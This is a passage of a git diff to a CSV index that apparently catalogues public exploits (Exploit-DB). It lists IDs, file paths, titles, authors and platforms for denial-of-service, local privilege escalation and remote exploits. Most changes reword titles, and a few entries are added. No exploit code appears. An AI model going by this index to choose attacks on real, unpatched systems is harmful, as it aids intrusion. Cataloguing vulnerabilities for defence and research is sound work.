Overflow",2012-11-13,"Francis Provencher",windows,dos,0 22681,platforms/windows/dos/22681.txt,"IrfanView - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 @@ -3491,7 +3491,7 @@ id,file,description,date,author,platform,type,port 27051,platforms/windows/dos/27051.txt,"Microsoft Windows - Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0 27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0 27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer '.JPEG'/.PICT' File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos,0 -27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0 +27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0 27089,platforms/windows/dos/27089.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (1)",2006-01-11,ZwelL,windows,dos,0 27090,platforms/windows/dos/27090.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)",2006-01-15,ZwelL,windows,dos,0 27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 - BlueTooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",multiple,dos,0 @@ -3910,7 +3910,7 @@ id,file,description,date,author,platform,type,port 30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow",2007-12-28,"Luigi Auriemma",linux,dos,0 30934,platforms/windows/dos/30934.txt,"Total Player 3.0 - '.m3u' File Denial of Service",2007-12-25,"David G.M.",windows,dos,0 30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0 -30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0 +30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0 30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0 30985,platforms/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0 30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 @@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow (Denial of Service)",2014-07-02,LiquidWorm,windows,dos,0 33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 - '.asx' Remote Denial of Service",2010-05-10,"Steve James",windows,dos,0 33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0 -34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0 +34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0 34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 - Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal",2010-05-28,"John Leitch",windows,dos,0 @@ -4325,7 +4325,7 @@ id,file,description,date,author,platform,type,port 34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0 34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0 34261,platforms/multiple/dos/34261.txt,"Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow",2010-07-06,"Luigi Auriemma",multiple,dos,0 -34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0 +34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0 34278,platforms/linux/dos/34278.txt,"LibTIFF 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos,0 34279,platforms/linux/dos/34279.txt,"LibTIFF 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service",2010-06-14,"Tom Lane",linux,dos,0 34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader 9.3.4 - 'AcroForm.api' Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 @@ -5003,7 +5003,7 @@ id,file,description,date,author,platform,type,port 39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0 39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0 -39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 +39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0 39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos,0 @@ -5052,7 +5052,7 @@ id,file,description,date,author,platform,type,port 39543,platforms/linux/dos/39543.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cdc_acm' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39544,platforms/linux/dos/39544.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'aiptek' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0 -39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0 +39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0 39550,platforms/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0 39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0 39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 @@ -5216,7 +5216,7 @@ id,file,description,date,author,platform,type,port 40253,platforms/windows/dos/40253.html,"Microsoft Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0 40255,platforms/windows/dos/40255.txt,"Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 40256,platforms/windows/dos/40256.txt,"Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 -40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 +40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 40308,platforms/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0 40289,platforms/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos,0 40291,platforms/linux/dos/40291.txt,"Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write",2016-08-23,"Kaslov Dmitri",linux,dos,0 @@ -5365,7 +5365,7 @@ id,file,description,date,author,platform,type,port 41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0 41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0 41192,platforms/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos,0 -41211,platforms/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos,0 +41211,platforms/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos,0 41212,platforms/android/dos/41212.txt,"Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation",2017-02-01,"Google Security Research",android,dos,0 41213,platforms/osx/dos/41213.html,"Apple WebKit - 'HTMLFormElement::reset()' Use-After Free",2017-02-01,"Google Security Research",osx,dos,0 41214,platforms/multiple/dos/41214.html,"Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion",2017-02-01,"Google Security Research",multiple,dos,0 @@ -5419,7 +5419,7 @@ id,file,description,date,author,platform,type,port 41637,platforms/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,windows,dos,0 41639,platforms/windows/dos/41639.txt,"ExtraPuTTY 0.29-RC2 - Denial of Service",2017-03-20,hyp3rlinx,windows,dos,0 41643,platforms/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",hardware,dos,0 -41645,platforms/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",windows,dos,0 +41645,platforms/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",windows,dos,0 41646,platforms/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0 41647,platforms/windows/dos/41647.txt,"Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0 41648,platforms/windows/dos/41648.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0 @@ -5506,7 +5506,7 @@ id,file,description,date,author,platform,type,port 42006,platforms/windows/dos/42006.cpp,"Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token",2017-05-15,"Google Security Research",windows,dos,0 42007,platforms/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - nt!NtTraceControl (EtwpSetProviderTraits) Pool Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0 42008,platforms/windows/dos/42008.cpp,"Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0 -42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys and tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0 +42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0 42014,platforms/ios/dos/42014.txt,"Apple iOS < 10.3.2 - Notifications API Denial of Service",2017-05-17,CoffeeBreakers,ios,dos,0 42017,platforms/multiple/dos/42017.txt,"Adobe Flash - AVC Deblocking Out-of-Bounds Read",2017-05-17,"Google Security Research",multiple,dos,0 42018,platforms/multiple/dos/42018.txt,"Adobe Flash - Margin Handling Heap Corruption",2017-05-17,"Google Security Research",multiple,dos,0 @@ -5703,6 +5703,7 @@ id,file,description,date,author,platform,type,port 42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0 42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0 42955,platforms/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos,0 +42970,platforms/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow",2017-10-10,"Agostino Sarubbo",linux,dos,0 42962,platforms/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",windows,dos,0 42969,platforms/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 @@ -5794,9 +5795,9 @@ id,file,description,date,author,platform,type,port 317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0 319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,linux,local,0 320,platforms/linux/local/320.pl,"suid_perl 5.001 - Exploit",1996-06-01,"Jon Lewis",linux,local,0 -321,platforms/multiple/local/321.c,"BSD & Linux umount - Privilege Escalation",1996-08-13,bloodmask,multiple,local,0 +321,platforms/multiple/local/321.c,"BSD / Linux - 'umount' Privilege Escalation",1996-08-13,bloodmask,multiple,local,0 322,platforms/linux/local/322.c,"Xt Library - Privilege Escalation",1996-08-24,"b0z0 bra1n",linux,local,0 -325,platforms/linux/local/325.c,"BSD & Linux lpr - Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0 +325,platforms/linux/local/325.c,"BSD / Linux - 'lpr' Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0 328,platforms/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",solaris,local,0 330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 331,platforms/linux/local/331.c,"LibXt - 'XtAppInitialize()' Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0 @@ -5880,7 +5881,7 @@ id,file,description,date,author,platform,type,port 793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0 795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0 796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0 -798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local 'Username' and Password Disclosure",2005-02-08,Kozan,windows,local,0 +798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0 811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local Exploit",2005-02-10,Kozan,windows,local,0 816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0 @@ -8594,7 +8595,7 @@ id,file,description,date,author,platform,type,port 33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0 33589,platforms/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",lin_x86-64,local,0 33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0 -33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0 +33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0 33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0 33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0 33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0 @@ -8643,7 +8644,7 @@ id,file,description,date,author,platform,type,port 35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local,0 35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Privilege Escalation",2014-10-22,"Glafkos Charalambous",windows,local,0 35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - '.wav' Buffer Overflow",2014-10-27,metacom,windows,local,0 -35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0 +35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0 35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local,0 35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0 35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0 @@ -9284,7 +9285,8 @@ id,file,description,date,author,platform,type,port 42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0 42951,platforms/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local,0 42960,platforms/win_x86-64/local/42960.txt,"Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,win_x86-64,local,0 -42963,platforms/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local,0 +42963,platforms/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - '.asx' Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local,0 +42974,platforms/windows/local/42974.py,"ASX to MP3 3.1.3.7 - '.m3u' Buffer Overflow",2017-10-11,"Parichay Rai",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9600,7 +9602,7 @@ id,file,description,date,author,platform,type,port 969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,windows,remote,21 970,platforms/linux/remote/970.c,"Snmppd - SNMP Proxy Daemon Remote Format String",2005-04-29,cybertronic,linux,remote,164 975,platforms/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Buffer Overflow",2005-05-01,muts,windows,remote,21 -976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0 +976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability + OS/SP Scanner",2005-05-02,class101,windows,remote,0 977,platforms/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0 979,platforms/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,windows,remote,0 981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b (Linux) - Format String Exploit",2005-05-05,cybertronic,linux,remote,25 @@ -10915,7 +10917,7 @@ id,file,description,date,author,platform,type,port 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0 -15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0 +15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,Unknown,windows,remote,0 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0 15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 @@ -11212,7 +11214,7 @@ id,file,description,date,author,platform,type,port 16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)",2010-07-16,Metasploit,windows,remote,0 16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16508,platforms/windows/remote/16508.rb,"Novell iPrint Client - ActiveX Control Buffer Overflow (Metasploit)",2008-06-16,Metasploit,windows,remote,0 -16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0 +16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0 16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager - Stack Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16511,platforms/windows/remote/16511.rb,"Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote,0 @@ -11766,7 +11768,7 @@ id,file,description,date,author,platform,type,port 18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 18658,platforms/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - 'vncviewer.exe' Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0 -18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0 +18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree / SimpleTree Classes",2012-03-28,rgod,windows,remote,0 18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0 18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0 18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0 @@ -11817,7 +11819,7 @@ id,file,description,date,author,platform,type,port 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0 -19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0 +19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit",1992-05-27,anonymous,solaris,remote,0 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0 19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Exploit",1998-04-07,"J.A. Gutierrez",aix,remote,0 19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote,0 @@ -11832,7 +11834,7 @@ id,file,description,date,author,platform,type,port 19092,platforms/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0 19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access",1999-04-22,"Georgi 